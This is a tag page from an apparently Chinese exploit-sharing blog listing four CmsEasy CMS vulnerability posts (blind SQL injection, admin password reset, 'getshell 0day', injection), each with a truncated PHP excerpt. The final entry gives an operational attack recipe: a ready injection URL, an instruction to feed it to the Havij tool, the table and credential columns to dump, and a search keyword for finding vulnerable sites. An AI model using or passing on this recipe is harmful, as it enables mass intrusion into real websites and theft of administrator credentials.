标签 CmsEasy 下的文章

cmseasy盲注漏洞

出错的是一个通用函数,所以注入不只一处,在这里就用能够相对简单利用的来写。lib/default/ballot_act.php [php] function index_action() { if (front::post('submit')) { if (!front::post('ballot')) {front::alert(lang('Please_select_vote'));re...

没穿底裤 2014 年 01 月 19 日 暂无评论

cmseasy修改任意管理员密码漏洞

lib/default/user_act.php [php] function edit_action() { if(front::post('submit')) { unset(front::$post['groupid']); unset(front::$post['powerlist']); foreach (front::$post as $k => $v){ if(is_...

没穿底裤 2014 年 01 月 19 日 暂无评论

cmseasy getshell 0day

by zvall 代码如下: celive/index.php 代码: [php] $_SESSION['thislive'] = md5(time()); $_SESSION['thislivetmp'] = $_SESSION['thislive'];if ($config['customer_info']) { header('Location: '.$config['url'].'/...

没穿底裤 2013 年 10 月 01 日 暂无评论

CmsEasy易通企业网站系统最新注入漏洞

易通企业网站系统最新注入漏洞。注入EXP:http://www.0day5.com/celive/js/include.php?cmseasylive=1111&departmentid=0直接放Havij里面跑。错误关键字:online.gif添加表名:cmseasy_user列表:userid,username,password百度关键字:Powered by CmsEasy

没穿底裤 2012 年 08 月 12 日 暂无评论